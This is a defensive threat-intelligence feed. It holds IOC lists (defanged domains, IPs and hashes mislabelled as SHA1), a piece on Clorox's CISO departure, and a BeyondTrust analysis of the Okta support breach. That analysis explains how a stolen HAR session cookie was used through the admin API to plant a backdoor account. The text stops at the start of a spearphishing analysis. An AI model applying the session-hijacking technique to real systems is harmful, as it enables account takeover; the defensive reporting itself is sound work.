spidercom[.]info<br /> t3rmin3[.]com<br /> taraanasongs[.]com<br /> thedailynewsheadline[.]com<br /> tow3r[.]info<br /> updatemypc[.]net<br /> updatesl1nk[.]com<br /> vall3y[.]com<br /> wearwellgarments[.]eu<br /> webjavaupdate[.]com<br /> webmicrosoftupdate[.]net</p>
<p> </p>
<p>Files SHA1<br /> 02e6ddbc715dfd7ce1838c4b4b0520c8<br /> 03636f6d4f0041859f009893eac67690<br /> 055ce289ee5d2c74e3a4de967f0ff82c<br /> 0936b73c4a0acae8fe9517e26536c058<br /> 0948c7444ff919ec7218ad04c29c8189<br /> 0a8435a4abe99c22b8e1a1673098821a<br /> 0aa0116bcfcf1da87af0ec393e2b8061<br /> 0c68acbe505877eee81aaaefd6be5d57<br /> 0cd662b540c642ac9a6972226a2ee8ae<br /> 0f65c1202881f5c0e3d512aa64162716<br /> 0f6e7efe4630bf314fd5d895f55bcd08<br /> 1782314da3da2f4fdcbda269ddfa7830<br /> 17d0705bcc65eb16f6c8aee6cc0c384f<br /> 182b4f223a20d10fa39a8577a7b285f8<br /> 186f71e7db3188347f3c7e3608e40a76<br /> 1a708fb0d40f0f66e75afe26f0754f3c<br /> 1ad6ac5126fbf79d92e211e7459a04fd<br /> 1c038adb34bd12940fc91d956eda0f85<br /> 1e33463abb80297907d2de0ddad75a94<br /> 20aa596a83117d12faebda225f4dcf25<br /> 21609c45130fbba1a8c07b6fe864bbc4<br /> 21b11f60bfd420475d81726587310204<br /> 22d559800aa213a7150fa8b2e54b2b21<br /> 2546f1229ddf1a45ab944a8a0da642ca<br /> 25472d552f3439d610a0ea0feea59b18<br /> 283b06e0931d58b320fb5222bd9e2327<br /> 28f7de0a63dd9f069e9892a7b9c1393e<br /> 2cf626da0f86b4ca0ce5ff12bbdd50b4<br /> 2fdb2e334bc32856898c4c5a9b7038bf<br /> 3625f274b26050e913d21280689580aa<br /> 3fa8a69d0e9f0163382d4733e7546061<br /> 40dc57f0e7eab28eac628cd7d58670f2<br /> 46110a31e7c579285ff9c2339c8e9dbf<br /> 463922075362745a02969f0cc34adb48<br /> 482840e161a8c5fb14fe57d13c7e58b1<br /> 48d0bca6196781e4030d2427e0cebb7c<br /> 4a4392583dd001c3729f8705e62f06d0<br /> 4ac3a570f006a1b0e016257d3be5018c<br /> 4d4c8e85691295de8552aab888979026<br /> 4ebe9891f10e93cbd18266b36f1b6e6e<br /> 51c984dac039092447879d40164fc949<br /> 572fb7ba509d5b2a57142149d6fb0dd7<br /> 596d1f7a84729cfb608b29f687ce318b<br /> 5b0172d4f6b3970cc460cbe0556b6466<br /> 5dddb3f57c9066b6d3d076f590d40d0a<br /> 5deabcd480ff2df5de3a93c081b76dda<br /> 5f04cf580b375ac90caf75930fd866e7<br /> 62cddd629043f07a7f2ec3bdbc825ff9<br /> 6588efd38e17d44e3ff1ab91afd0f2b2<br /> 672bb005aeaf5805c6d06c581a8d1b10<br /> 67caeeca9dc86cbc0f494d89c43aab4e<br /> 6b683fccfb118eb96af0cb8cfcc3b2f7<br /> 6cc8f81c50b8e86feea0dd800f3e8901<br /> 6cd6aa3065d51f3c14784b2abb87b2a4<br /> 6e6eb5af7488e5c9e1ada0efd624235f<br /> 6fc6214a9cc6bb1ed442beda98fe47e6<br /> 72a0da9442e1669e832c128936774c92<br /> 74e571f9accf9fe1b4ea6ee0e02a5180<br /> 75b61ceaf2dc1acce6de9c55103f7f05<br /> 77373d579ac6479adf7140340abeb667<br /> 77e88fa11cb0cf44c4691c04742d1b13<br /> 7835c1a2a0cb7249c82c9d283526188d<br /> 79b914e089fe7b1029dd38bb08d7dcd4<br /> 7a8c0735b6e631651a6618a789b86315<br /> 7baad0dba7909e810c55f4678c301d7e<br /> 8046761d8e617dc2dbbc3bc93fc91ed3<br /> 81c33d5c2d1d71d2639283be169ad235<br /> 82262bf6215659485d31df672562060d<br /> 849fda2210df92da8d6d45f692a583b0<br /> 862f6fe18ff2f493a8b3b927d51e82b3<br /> 8658145bdc3f0cae5357d4115b05543b<br /> 87f05d07b1c60b317d3fb60335745428<br /> 87f9beffa5b6198e5906efd971475dea<br /> 8a65479b077295d8420430e9f114b6a2<br /> 8ca0082df24a060c0edcd3a4875a63ab<br /> 903b160fc4e720ea884e4222b5dc3f7e<br /> 91c21e837620a005c8d5e1cb73e9bfb8<br /> 91f2bb5f6c2f3452724f831373474865<br /> 9225fc6926516f04bf87e44b3e9201e1<br /> 92bfb44848a886b388576c60745aa605<br /> 963fbcdaec66a5fcd5664e932fa06f4d<br /> 9a9dc1bebfb0f6a713c5119f8c1b89a0<br /> 9b98e06c25c1ae3e8d0625b15a31fc75<br /> 9bf5982f68023900b678cfe08b76498e<br /> a053b31eaa11e2eedc0182a8e0051bf3<br /> a1d78a37d6f278e99e0a904471cd448c<br /> a33175880547ab5296c302681290c922<br /> a3ecdcf43f89074e4042d01987255a5f<br /> a5d3738287ec9d74ca9bcdd5fa2d9018<br /> a6a9abbc67cbe071d6ed639fec3e1b84<br /> a810399062152e79c0f1d5e6b0f8c1ea<br /> aa026aaa783f691c6da7c286af5439c7<br /> aa8039e7b0c08c369820f450f2a12ef8<br /> ad6cc39b31878c270bf1f4e106c1f773<br /> ae03020fc96296a210d26e9efa0948c6<br /> af41aaa36b787c95c0132551555dc8e1<br /> af7ed912b633fcad5d4e9b52df9de72a<br /> b35702471ac848a23b33b4b3aaaddf04<br /> b3ec88a92a5881e10f6dd46a2e43f419<br /> b5724f5b127e118babbbd4f31f93da7b<br /> b5a53dfa9a2b5bdae9f5bd99b114cf75<br /> b5d248e62a6c593d19104411b411146f<br /> b6a371b2dc3143e3c5df0abc2c0604a3<br /> b7b6dd5bcb3dcd87b74d1485b356a560<br /> b7d18dbe6cad4b54b588ec5eed3a8141<br /> b86fd1cfe2de2ea841f8f522dee6370c<br /> b8baedf06d212a1769c17741a22dbabb<br /> bba2d1e279101d9df3ee135a997457c7<br /> bba7accf299c87080a7c12f3913b851a<br /> bc04127266eab3c142fd9ab8bf16cae2<br /> be4fcca6b05fcd65ca2d8e42c1f7f685<br /> c14f235e08f6d855f5e73661fa758ff2<br /> c4130bcfbec35b377b512ceb64221293<br /> c43f52ec6902b9ee2be435072a9d3b2a<br /> c44e2798f7a6a18b7a61d811bd884981<br /> c48e5210cf6fb3286f8bc66106456686<br /> c5a9f8a833d8eafa50d81f04fed7d42a<br /> c7cb3ec000ac99da19d46e008fd2cb73<br /> c8717112454bb0bee2d8afcba4c55c31<br /> c95be0d57d7688861d685966069c18a2<br /> cb3a7c4433e35ff3dfede853731c5004<br /> cd6e61b12e08cab7f5a6201c6db5d6bd<br /> cdc425240cb1e38c8432501062ff704a<br /> ce157212cd908bc0d3b16949822dec6f<br /> d0e966b61e15490ad958b8db3a4a624b<br /> d2a1dc1cde78900927bd6a0ffc3a87a2<br /> d6821dcf113e28e2c852febf5d0f2725<br /> d8dcf2a53505a61b5915f7a1d7440a2e<br /> daf3f0ed5e86cb7c0f6553911051c39e<br /> ddef9714a67219b45eb0e6f66a447c11<br /> de50630da67f860a402d5bd298f5224f<br /> e3ed385d2ce873eabe647c1c6de144eb<br /> e6b37e2113471b4b7acc833c99fc9c0f<br /> e7c72900ede1a3fcebc40e72163642d3<br /> e952bba9789b7e2983d2441ba52d9a19<br /> ecac2ce6e52c78718c0d0f7a99829136<br /> ed67f4e36aabf56d8fb830463cbc5487<br /> eddd399d3a1e3a55b97665104c83143b<br /> ef3b0ae4d6870291f6812ed77e23b558<br /> f0dba8a8349552e5e632d395cd1be8ea<br /> f2036ae83a79f62c749913576ba63ba6<br /> f211694aaf443b12b2eca9f5e7f25407<br /> f2a46ad687356eb9099bc7269411f76a<br /> f4949579248c94ee81ed1a6a8c246126<br /> f61db022aa5dfb59dbd53938c5a72a2c<br /> f6f131beb246d0c7f916c5c995ad91cd<br /> f8df4e8457d1c6f4f395701b0f9e839b<br /> f8ecfee30bda0ad37f69f407f9a4c781<br /> f9cdf5bebdee5486d26cd0e1a6c3d336<br /> fad0db73af342501a0568730b4a24d79<br /> fb72b395080807571cd784be89415612<br /> fdfcb23f537d4265bab7f28ec9b9e036</p>
<p> </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941%C2%A0">https://www.linkedin.com/company/64265941 </a></li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.sentinelone.com/labs/elephant-hunting-inside-an-indian-hack-for-hire-group/">https://www.sentinelone.com/labs/elephant-hunting-inside-an-indian-hack-for-hire-group/</a></p></div>Clorox's Cybersecurity Chief Departshttps://redskyalliance.org/xindustry/clorox-s-cybersecurity-chief-departs2023-11-24T17:00:00.000Z2023-11-24T17:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12299288673,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12299288673,RESIZE_400x{{/staticFileLink}}" width="250" alt="12299288673?profile=RESIZE_400x" /></a>Recently, it was announced that the Clorox company’s CISO has stepped down from her position. Her departure comes as the company is still recovering from a devastating cyberattack that paralyzed its order fulfillment facilities for more than a month, leading to a 20% decline in net revenue in the first quarter of the fiscal year.</p>
<p>The reasons behind her departure have not been publicly disclosed. Still, her decision to step down during such a critical time for Clorox's cybersecurity efforts has raised concerns among experts and investors alike. Some speculate she may have been frustrated with the company's slow response to the cyberattack and its lack of investment in cybersecurity measures. Others suggest that she may have felt overwhelmed by the challenges of leading the company's cybersecurity efforts in the aftermath of such a significant breach.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/clorox-woes">https://redskyalliance.org/xindustry/clorox-woes</a></p>
<p>As a public company, Clorox leaves its CISO with fiduciary duties in both fact and act (even if not explicitly mentioned). Noting this, leaders must be ready to confront the consequences of cybersecurity failures that inflict financial harm to investors. Conversely, suppose a CISO is to be held accountable like a CFO or General Counsel concerning matters of investor confidence. In that case, the executive contours of the CISO role should be revisited to ensure that it has sufficient authority, agency, and institutional backing to defend data assets as a fiduciary.</p>
<p>Whatever the reasons for the departure, her exit is a setback for Clorox as it struggles with the ongoing fallout from the security incident and the increasing sophistication of cyber threats. The company now faces the task of finding a new CISO who can restore trust in its cybersecurity capabilities and lead the company into the future. And who wants the position, seeing what happened to the former CISO?</p>
<p>"Assuming she <sic> knew the environment was vulnerable before the incident if she withheld this from the responsible executives, then she should be fired," said an independent consultant and former Security Assurance Director at The Walt Disney Company. "However, if she informed the executive committee of the risk and they accepted it by not acting, she should be rewarded. Unfortunately, sometimes, CIOs do not want CISOs to be transparent with the executive committee. The CISO implicitly accepts the risk and is rewarded for not rocking the boat until an incident happens."</p>
<p>Clorox's cyberattack is just one of many recent incidents highlighting the growing security risks associated with global supply chains. As companies increasingly rely on third-party vendors and suppliers, their attack surfaces expand, making them more vulnerable to malicious actors. In the case of Clorox, the cyberattack disrupted the company's ability to deliver products to its customers, causing significant financial losses. The attack also exposed sensitive customer data, potentially damaging the company's reputation and customer trust.</p>
<p>With increasing global cybersecurity threats, the role of the CISO has become increasingly important. CISOs are responsible for overseeing and managing a company's cybersecurity program, which includes protecting its networks, data, and systems from cyberattacks.</p>
<p>In today's complex and interconnected world, CISOs need to think strategically, communicate effectively with senior management, and have a deep understanding of cybersecurity technologies and best practices. They also need to be able to build and manage a team of skilled cybersecurity professionals despite very challenging workforce dynamics. CIOS's will also be asked to take on the burden of personal risk and liability in this position</p>
<p> </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, a demo, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941%C2%A0">https://www.linkedin.com/company/64265941 </a></li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p></div>The October Okta Hithttps://redskyalliance.org/xindustry/the-october-okta-hit2023-10-23T16:00:00.000Z2023-10-23T16:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12263916864,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12263916864,RESIZE_400x{{/staticFileLink}}" alt="12263916864?profile=RESIZE_400x" width="250" /></a>Okta Security has identified adversarial activity that leveraged access to a stolen credential to access Okta's support case management system. The threat actor was able to view files uploaded by certain Okta customers as part of recent support cases. It should be noted that the Okta support case management system is separate from the production Okta service, which is fully operational and has not been impacted. In addition, the Auth0/CIC case management system is not impacted by this incident.</p>
<p>Note: All customers who were impacted by this have been notified. If you’re an Okta customer and you have not been contacted with another message or method, there is no impact to your Okta environment or your support tickets.</p>
<p>Within the course of normal business, Okta support will ask customers to upload an HTTP Archive (HAR) file, which allows for troubleshooting of issues by replicating browser activity. HAR files can also contain sensitive data, including cookies and session tokens, that malicious actors can use to impersonate valid users. Okta has worked with impacted customers to investigate, and has taken measures to protect our customers, including the revocation of embedded session tokens. In general, Okta recommends sanitizing all credentials and cookies/session tokens within a HAR file before sharing it.<a href="#_ftn1">[1]</a></p>
<p>Attacks such as this highlight the importance of remaining vigilant and being on the lookout for suspicious activity. We are sharing the following Indicators of Compromise to assist customers who wish to perform their own threat hunting activity. We recommend referring to our previously published advice on how to search System Log for any given suspicious session, user or IP. Please note that the majority of the indicators are commercial VPN nodes according to our enrichment information.</p>
<p>IP Addresses:</p>
<p>23.105.182[.]19</p>
<p>104.251.211[.]122</p>
<p>202.59.10[.]100</p>
<p>162.210.194[.]35 (BROWSEC VPN)</p>
<p>198.16.66[.]124 (BROWSEC VPN)</p>
<p>198.16.66[.]156 (BROWSEC VPN)</p>
<p>198.16.70[.]28 (BROWSEC VPN)</p>
<p>198.16.74[.]203 (BROWSEC VPN)</p>
<p>198.16.74[.]204 (BROWSEC VPN)</p>
<p>198.16.74[.]205 (BROWSEC VPN)</p>
<p>198.98.49[.]203 (BROWSEC VPN)</p>
<p>2.56.164[.]52 (NEXUS PROXY)</p>
<p>207.244.71[.]82 (BROWSEC VPN)</p>
<p>207.244.71[.]84 (BROWSEC VPN)</p>
<p>207.244.89[.]161 (BROWSEC VPN)</p>
<p>207.244.89[.]162 (BROWSEC VPN)</p>
<p>23.106.249[.]52 (BROWSEC VPN)</p>
<p>23.106.56[.]11 (BROWSEC VPN)</p>
<p>23.106.56[.]21 (BROWSEC VPN)</p>
<p>23.106.56[.]36 (BROWSEC VPN)</p>
<p>23.106.56[.]37 (BROWSEC VPN)</p>
<p>23.106.56[.]38 (BROWSEC VPN)</p>
<p>23.106.56[.]54 (BROWSEC VPN)</p>
<p>User-Agents / While the following user-agents are legitimate, they may be rare in your environment given the release of Chrome 99 in March 2022.</p>
<p>Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 (Legitimate, but older user-agent)</p>
<p>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.83 Safari/537.36 (Legitimate, but older user-agent)</p>
<p>Analysis:<a href="#_ftn2">[2]</a></p>
<p>On 2 October 2023, the BeyondTrust security teams detected an identity-centric attack on an in-house Okta administrator account. The team immediately detected and remediated the attack through our own Identity Security tools, resulting in no impact or exposure to BeyondTrust’s infrastructure or to our customers. The incident was the result of Okta’s support system being compromised which allowed an attacker to access sensitive files uploaded by their customers.</p>
<p>The incident began when BeyondTrust security teams detected an attacker trying to access an in-house Okta administrator account using a valid session cookie stolen from Okta’s support system. Custom policy controls blocked the attacker's initial activity, but limitations in Okta's security model allowed them to perform a few confined actions. BeyondTrust’s own Identity Security Insights tool alerted the team of the attack, and they were able to block all access and verify that that attacker did not gain access to any systems.</p>
<p>The initial incident response indicated a possible compromise at Okta of either someone on their support team or someone in position to access customer support-related data. Concerns were raised regarding a breach to Okta on 2 October. Having received no acknowledgement from Okta of a possible breach, analysts persisted with escalations within Okta until 19 October when Okta security leadership notified BeyondTrust that they had indeed experienced a breach and we were one of their affected customers.</p>
<p>Okta has now issued a statement confirming the breach that we detected nearly three weeks ago. Again, while there was no exposure to BeyondTrust or our customers, analysts are sharing details of the attack to educate other Okta users and infosec professionals. For BeyondTrust customers who leverage our Identity Security Insights product, experts have also outlined the various detections that would alert you to this type of attack and recommendations to better control your attack surface and limit the possibility and impact of Okta-focused attacks.</p>
<p>Timeline Overview</p>
<p>2 October 2023 – Detected and remediated identity centric attack on an in-house Okta administrator account and alerted Okta.</p>
<p>3 October 2023 – Asked Okta support to escalate to Okta security team given initial forensics pointing to a compromise within Okta support organization.</p>
<p>11 October 2023 and October 13, 2023 – Investigators held Zoom sessions with Okta security team to explain why we believed they might be compromised.</p>
<p>19 October 2023 – Okta security leadership confirmed they had an internal breach, and BeyondTrust was one of their affected customers.</p>
<p>Attack Details:</p>
<p>On 2 October 2023, an Okta support agent requested a BeyondTrust Okta administrator generate a HAR file to assist in resolving an ongoing support issue the administrator was working on. HAR files are HTTP archives that can be generated by a web browser to log interactions with a website, in this case used for debugging an issue with the site. The administrator complied with the request and generated a HAR file containing an API request and a session cookie which was uploaded to the Okta support portal.</p>
<p>The Okta administrator’s account was protected with FIDO2 authentication, and policies within BeyondTrust’s Okta only allowed access to the admin console from managed devices with Okta Verify installed.</p>
<p>Within 30 minutes of the administrator uploading the file to Okta’s support portal an attacker used the session cookie from this support ticket, attempting to perform actions in the BeyondTrust Okta environment. BeyondTrust’s custom policies around admin console access initially blocked them, but they pivoted to using admin API actions authenticated with the stolen session cookie. API actions cannot be protected by policies in the same way as actual admin console access. Using the API, they created a backdoor user account using a naming convention like existing service accounts.</p>
<p>Our own instance of BeyondTrust’s Identity Security Insights, and tailored detections from our security teams, alerted us to several aspects of the intrusion. Analysts immediately disabled the backdoor user account and revoked the attacker’s access before the account could be used and preventing any further actions. They saw no evidence of other irregular activity across all other privileged Okta users in Identity Security Insights, no evidence of other suspicious Okta accounts being created, and no evidence of any unusual activity in the targeted user’s account before this incident.</p>
<p>Detailed Attack Timeline - Below is the detailed timeline of events:</p>
<p>2 October 2023 - A BeyondTrust Okta administrator uploads a browser recording (HAR file) at the request of Okta support related to ongoing troubleshooting of a non-security related support issue.</p>
<p>Within 30 minutes of the support file upload there was an attempt to access the BeyondTrust Okta admin console as the BeyondTrust Okta administrator using an IP address in Malaysia linked to anonymizing proxy/VPN services. Okta events are logged from this <u>Malaysian IP</u> however there were no prior authentication events or activity from this user in this location as we would normally expect.</p>
<p>Attacker was authenticated, but access to the Okta console was denied due to a non-default Okta security policy configuration enforced by BeyondTrust security teams:</p>
<ul>
<li>Default deny access and only allow access if specific criteria is met.</li>
<li>Attacker denied console access due to policy requirement of requiring Okta Verify on a managed device.</li>
<li>Attacker attempts to generate a password health report using the underlying API of the Okta admin console.</li>
<li>The attacker attempts to gain access to main Okta dashboard but receives a policy challenge.</li>
</ul>
<p>Note: It is important for Okta customers to enhance security policies through settings such as prompting admin users for MFA at every sign in. While this was within an existing session the attacker hijacked, Okta still views dashboard access as a new sign in, and prompts for MFA. Attacker uses Okta official API to create a fake service account named “svc_network_backup” to make it look like existing service accounts.</p>
<p>Note: Session cookies can be used to authenticate to official Okta API and in many cases, these lack the policy restrictions that apply to the interactive admin console.</p>
<p>The attacker acted quickly, but detections and responses were immediate, disabling the account and mitigating any potential exposure. BeyondTrust initiated an incident response process, immediately isolating and forensically investigating all systems and accounts associated with the administrator.</p>
<p>The investigation did not discover any indication of compromise however it did uncover the HAR file that had been generated for the support case. This was notable as these are only created in exceptional circumstances, in this instance for troubleshooting a support case. BeyondTrust contacted Okta support to inform them of our concerns while we continued to investigate.</p>
<p>3 October 2023 - Further investigation ruled out the possibility of the compromise originated from a BeyondTrust system leading us to conclude the Okta support system was likely compromised. Requested Okta support to escalate to their information security team given our concern that Okta was likely compromised, and other Okta customers might be exposed. No known compromise or ongoing security incident was communicated by Okta.</p>
<p>11 October 2023 - Okta Support Zoom meeting with a member of their information security team where we shared our findings and requested additional log data from Okta related to support case data access. Okta committed to providing the requested logs and working with us. No known compromise or ongoing security incident was communicated by Okta.</p>
<p>13 October 2023 - Okta support logs were received but contained several discrepancies. BeyondTrust requested more detailed logs relating to the discrepancies and reiterated concerns that there was a high likelihood of compromise within Okta support and that we were likely not the only customer impacted. No known compromise or ongoing security incident was communicated by Okta.</p>
<p>19 October 2023 - Call with Okta Security Leadership who notified investigators that there was a breach at Okta and we were one of the customers exposed during that breach.</p>
<p>20 October 2023 - Coinciding with Okta’s public announcement, a decision was made to publish this blog with detailed information including indicators of compromise to provide information to the security community and protect mutual customers. </p>
<p>BeyondTrust would like to thank Okta for working with us to protect mutual customers. We appreciate their transparency in reporting this breach, notifying affected customers, and highlighting further investigative steps.</p>
<p>Identity Security Insights Detections Specific to this Discovery - The following are detections and recommendations available within BeyondTrust’s Identity Security Insights solution would have triggered for Insights customers if they were targeted by the techniques used in this Okta attack. </p>
<p>Okta session hijacking: Attackers steal Okta session cookies and use them to access Okta from infrastructure they control, allowing them to bypass most MFA and security controls related to authentication. This detection looks for suspicious sessions appearing without an authentication event that are consistent with session hijacking.</p>
<p>Okta user performed administrative action using a proxy: This attacker, and other Okta-focused attackers like <strong>Scattered Spider</strong> often use proxies to login as privileged users and perform sensitive administrative actions, but legitimate users rarely do.</p>
<p>Okta admin privileges were granted to a user: Attackers often attempt to escalate privilege, or grant privilege to backdoor accounts. This information-level detection highlights all Okta admin assignments. These assignments are typically rare and usually occur within an established process.</p>
<p>Okta password health report generated: This report is generated rarely in most environments we monitor. This information-level detection highlights when that happens in case the activity is suspicious.</p>
<p>Okta user with some level of admin access uses MFA vulnerable to SIM swapping: Our incident response process was significantly faster because the admin user used FIDO2 for MFA, allowing us to rule out attacker-in-the-middle phishing as the mechanism for the token theft. Posture recommendations for privileged users give identity security professionals incremental changes they can make to better protect these crucial accounts. </p>
<p>If you are currently using <u>Insights</u>, please review your findings for any applicable detections based on the details below and feel free to reach out to BeyondTrust Support for help reviewing your own environment’s potential exposure from Okta’s breach. If you are not currently an Identity Security Insights customer but would like to leverage our free trial to assess your environment, please contact us.</p>
<p>Indicators of Compromise:</p>
<ul>
<li>Access to Okta admin functions through proxy (isproxy: true in Okta log events)</li>
<li>Access to Okta from IPs 202[.]59.10.100 or 23[.].105.182.19</li>
<li>Access to Okta, especially Okta admin functions, from VPS/hosting providers. (Especially: VPS Malaysia, LeaseWeb.)</li>
<li>Access to Okta with this user agent for an outdated version of chrome for MacOs: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3538.77 Safari/537.36</li>
<li>Okta account created via REST API with name svc_network_backup, or another name mimicking existing, legitimate accounts.</li>
<li>Activity against endpoints like /reports/password-health/async_csv_download_schedule?, which are typically used from Okta Admin Console UI only, without any corresponding admin console login</li>
<li>Okta activity for a user without any clear indication that the user authenticated (e.g. a user.session.start event for that user from a similar geographic area)</li>
<li>Admin console login attempts that are denied by policy without a subsequent successful login to admin console from the same user within an hour</li>
</ul>
<p>Other Notes - Okta have recently updated their KB articles relating to the creation and sanitization of HAR files, we recommend reviewing these. We did not see any failed attempts to use the stolen session after its expiration, but this may be because actions attempted with expired sessions do not appear in Okta logs.</p>
<p>Recommended Posture Improvements:</p>
<ul>
<li>Add policy controls in Okta to restrict access to admin console.</li>
<li>Consider adjusting Okta global session policy to issue an MFA challenge at every sign on, which will prevent attackers with a stolen cookie from accessing main dashboard.</li>
<li>Limit length of Okta sessions and take other steps to reduce window during which a stolen cookie can be used.</li>
<li>Be aware that admin API actions authenticated via session cookie are only covered by the Global Session Policy, which is often less restrictive than other policies.</li>
<li>Be aware that session hijacking allows attackers to bypass MFA.</li>
<li>Require strong hardware MFA for all Okta admins to prevent token hijacking via attacker-in-the-middle phishing.</li>
</ul>
<p><br /> Closing Thoughts - Modern identity-based attacks can be complex, and as this attack shows, can originate from environments outside your own. Good specific policies and internal controls are necessary to limit things like how HAR files are shared. Defense in depth is important though. The failure of a single control or process should not result in breach. Here, multiple layers of controls -- e.g. okta sign on controls, identity security monitoring, and so on - prevented a breach.</p>
<p><a href="https://www.beyondtrust.com/blog/entry/lessons-in-okta-security">https://www.beyondtrust.com/blog/entry/lessons-in-okta-security</a></p>
<p> </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941%C2%A0">https://www.linkedin.com/company/64265941 </a></li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://sec.okta.com/harfiles">https://sec.okta.com/harfiles</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://www.beyondtrust.com/blog/entry/okta-support-unit-breach">https://www.beyondtrust.com/blog/entry/okta-support-unit-breach</a></p></div>Azerbaijan & Armenia Cyber Meddlinghttps://redskyalliance.org/xindustry/azerbaijan-armenia-cyber-meddling2023-10-04T16:00:00.000Z2023-10-04T16:00:00.000ZCyberDoghttps://redskyalliance.org/members/CyberDog189<div><p><em><a href="{{#staticFileLink}}12239425294,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12239425294,RESIZE_400x{{/staticFileLink}}" width="250" alt="12239425294?profile=RESIZE_400x" /></a></em><a href="https://www.cfr.org/global-conflict-tracker/conflict/nagorno-karabakh-conflict">In 1923</a>, the Soviet Union created the Nagorno-Karabakh Autonomous Oblast (an oblast is an administrative region or province) within the Azerbaijan Soviet Socialist Republic. This oblast has a 95% ethnically Armenian population. In 1988, Nagorno-Karabakh intended to leave Azerbaijan and join the neighboring Republic of Armenia. While the Soviet Union was able to keep the resulting tension under control, once the USSR began to collapse, armed conflict between Azerbaijan and Armenia began for control of the Nagorno-Karabakh region. While a ceasefire was tentatively reached in 1994 and again in 2020, <a href="https://www.reuters.com/world/us-calls-azerbaijan-halt-karabakh-attack-russia-urges-return-ceasefire-2023-09-20/">tensions remain high</a> between the two countries.</p>
<p><strong>Affected platforms: </strong>Microsoft Windows<br /> <strong>Impacted parties: </strong>Targeted mgmt associated with an Azerbaijanian company<br /> <strong>Impact: </strong>Reconnaissance of basic computer info of targeted users<br /> <strong>Severity level: </strong>Low</p>
<p>A Spearphishing Campaign Exploits the Azerbaijan-Armenia Conflict - In August 2023, FortiGuard Labs discovered an infected memo pretending to come from the current president of a company in Azerbaijan and aimed at the management teams of associated businesses. Opening this memo downloads malware designed to gather basic information from its targets.<a href="#_ftn1">[1]</a></p>
<p><em><br /> <a href="{{#staticFileLink}}12239426061,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239426061,RESIZE_584x{{/staticFileLink}}" width="457" alt="12239426061?profile=RESIZE_584x" /></a>Figure 2. Memo</em></p>
<p>This blog analyzes the attack chain, reviews the malware’s capabilities, and reveals the possible location of the threat actor behind it.</p>
<p>Anatomy of an Attack - FortiGuard Labs spotted this attack by finding the memo in Figure 2. The memo claims to have information about a border clash between soldiers from Azerbaijan and Armenia.</p>
<p><br /> <a href="{{#staticFileLink}}12239426082,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239426082,RESIZE_584x{{/staticFileLink}}" width="493" alt="12239426082?profile=RESIZE_584x" /></a><em>Figure 3. Attack flow</em></p>
<p>The memo is in HTML format and uses <a href="https://attack.mitre.org/techniques/T1027/006/">HTML smuggling</a> to deliver a password-protected archive automatically. This archive, as the memo suggests, contains several images. As shown in the attack diagram in Figure 3, the archive contains three clean images and one phony image. The actual contents are illustrated below.</p>
<p><em><a href="{{#staticFileLink}}12239426252,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239426252,RESIZE_710x{{/staticFileLink}}" width="598" alt="12239426252?profile=RESIZE_710x" /></a>Figure 4. Contents of the zip archive with parts obfuscated for PII purposes</em></p>
<p>An astute observer may notice that the first "image" is not an image file. In reality, it is a .LNK shortcut that executes the following command:</p>
